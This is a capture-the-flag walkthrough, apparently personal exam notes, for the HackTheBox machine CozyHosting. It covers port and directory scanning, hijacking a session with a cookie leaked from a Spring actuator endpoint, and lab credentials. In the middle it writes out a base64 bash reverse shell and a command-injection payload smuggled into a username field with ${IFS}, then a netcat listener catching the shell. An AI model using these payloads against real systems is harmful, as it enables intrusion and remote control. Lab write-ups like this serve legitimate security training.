HTB CozyHosting done
CozyHosting
OS:
Linux
Technology:
SPRING core java framework
IP Address:
10.10.11.230
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and pass:
From: http://cozyhosting.htb/actuator/sessions
user: kanderson
cookie: 77C3563811D9CBBD4E0A6E799EC50E23
---
From file: /tmp/cloudhosting/BOOT-INF/classes/application.properties
postgresql://localhost:5432/cozyhosting
username=postgres
password=Vg&nvzAQ7XxR
---
SSH user: josh
L: josh
P: manchesterunited
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.230_nmap 10.10.11.230 ; cat 10.10.11.230_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 22:22 UTC
Nmap scan report for 10.10.11.230
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add IP to /etc/hostname
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ cat /etc/hosts | grep cozyhosting
10.10.11.230 cozyhosting.htb
Ffuz: http://cozyhosting.htb - big.txt
Interesing folder: admin
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ffuf -u http://cozyhosting.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o cozyhosting.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : cozyhosting.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin [Status: 401, Size: 97, Words: 1, Lines: 1, Duration: 86ms]
asdfjkl;.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
asdfjkl;.txt [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl;.html [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl; [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl;.bac [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 55ms]
asdfjkl;.backup [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
error [Status: 500, Size: 73, Words: 1, Lines: 1, Duration: 63ms]
index [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 82ms]
login [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 49ms]
logout [Status: 204, Size: 0, Words: 1, Lines: 1, Duration: 256ms]
:: Progress: [122814/122814] :: Job [1/1] :: 485 req/sec :: Duration: [0:04:59] :: Errors: 0 ::
Ffuz: http://cozyhosting.htb - spring-boot.txt
Interesting folder: actuator
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ffuf -u http://cozyhosting.htb/FUZZ -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt -ac -recursion -recursion-depth=1 -o cozyhosting.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : cozyhosting.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 231ms]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 99ms]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 129ms]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 148ms]
actuator/sessions [Status: 200, Size: 48, Words: 1, Lines: 1, Duration: 62ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 562ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 624ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 626ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 605ms]
:: Progress: [672/672] :: Job [1/1] :: 576 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
Open website: http://cozyhosting.htb/actuator
I found a few endpoint, I focus on: /actuator/sessions
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ curl -s http://cozyhosting.htb/actuator | jq
{
"_links": {
"self": {
"href": "http://localhost:8080/actuator",
"templated": false
},
"sessions": {
"href": "http://localhost:8080/actuator/sessions",
"templated": false
},
"beans": {
"href": "http://localhost:8080/actuator/beans",
"templated": false
},
"health": {
"href": "http://localhost:8080/actuator/health",
"templated": false
},
"health-path": {
"href": "http://localhost:8080/actuator/health/{*path}",
"templated": true
},
"env": {
"href": "http://localhost:8080/actuator/env",
"templated": false
},
"env-toMatch": {
"href": "http://localhost:8080/actuator/env/{toMatch}",
"templated": true
},
"mappings": {
"href": "http://localhost:8080/actuator/mappings",
"templated": false
}
}
}
Open website: http://cozyhosting.htb/actuator/sessions
I found username and cookie (guess)
U: kanderson
Id session: 77C3563811D9CBBD4E0A6E799EC50E23
---
http://cozyhosting.htb/actuator/sessions
77C3563811D9CBBD4E0A6E799EC50E23 "kanderson"
2D0888E10E24803A1363CDB52E16E51F "UNAUTHORIZED"
Open website: http://cozyhosting.htb/admin
We put JSESSIONID for user kanderson into cookie
JSESSION: 77C3563811D9CBBD4E0A6E799EC50E23
user: kanderson
Command Injection -> revshell
Create payload
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ echo "bash -i -p >& /dev/tcp/10.10.14.25/80 0>&1" | base64
YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS84MCAwPiYxCg==
Revshell
* Put revshell into website
Payload:
user;echo${IFS}YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS84MCAwPiYxCg==|base64${IFS}-d|bash;
---
* Start revshell
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.11.230] 33400
bash: cannot set terminal process group (1060): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$
Lateral Movement
Unzip app: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ unzip -d /tmp/cloudhosting cloudhosting-0.0.1.jar
unzip -d /tmp/cloudhosting cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: /tmp/cloudhosting/META-INF/
inflating: /tmp/cloudhosting/META-INF/MANIFEST.MF
creating: /tmp/cloudhosting/org/
creating: /tmp/cloudhosting/org/springframework/
creating: /tmp/cloudhosting/org/springframework/boot/
creating: /tmp/cloudhosting/org/springframework/boot/loader/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/ClassPathIndexFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/ExecutableArchiveLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/JarLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader$DefinePackageCallType.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader$UseFastConnectionExceptionsEnumeration.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/Launcher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/MainMethodRunner.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$ArchiveEntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$ClassPathArchives.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$PrefixMatchingArchiveFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/WarLauncher.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/archive/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive$Entry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive$EntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$AbstractIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$ArchiveIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$FileEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$SimpleJarFileArchive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$AbstractIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$JarFileEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$NestedArchiveIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/data/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessData.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile$DataInputStream.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile$FileAccess.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/jar/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AbstractJarFile$JarFileType.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AbstractJarFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AsciiBytes.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/Bytes.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord$Zip64End.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord$Zip64Locator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryFileHeader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryParser.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryVisitor.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/FileHeader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/Handler.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntryCertification.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile$JarEntryEnumeration.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$Offsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$Zip64Offsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$ZipOffsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileWrapper.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection$JarEntryName.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/StringSequence.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/ZipInflaterInputStream.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/JarMode.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/JarModeLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/TestJarMode.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/util/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/util/SystemPropertyUtils.class
creating: /tmp/cloudhosting/BOOT-INF/
creating: /tmp/cloudhosting/BOOT-INF/classes/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/compliance/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/scheduled/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/exception/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/php-email-form/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/
creating: /tmp/cloudhosting/BOOT-INF/classes/templates/
creating: /tmp/cloudhosting/META-INF/maven/
creating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/
creating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/UserRepository.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/MvcConfig.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/CozyHostingApp.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/LoginListener.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/exception/ExceptionHandler.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/admin.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/style.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/main.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/admin.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/footer-bg.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/hero-bg.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/profile-img.jpg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-2.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-3.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-starter.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-1.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-free.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/favicon.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/logo.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-ultimate.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-business.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/hero-img.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/isotope.pkgd.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/isotope.pkgd.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/plyr.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/plyr.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/glightbox.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/glightbox.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/glightbox.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/glightbox.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.scss
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/bootstrap-icons.woff2
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/bootstrap-icons.woff
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.json
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.woff2
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.woff
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/php-email-form/validate.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/purecounter_vanilla.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/purecounter_vanilla.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/aos.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/aos.js
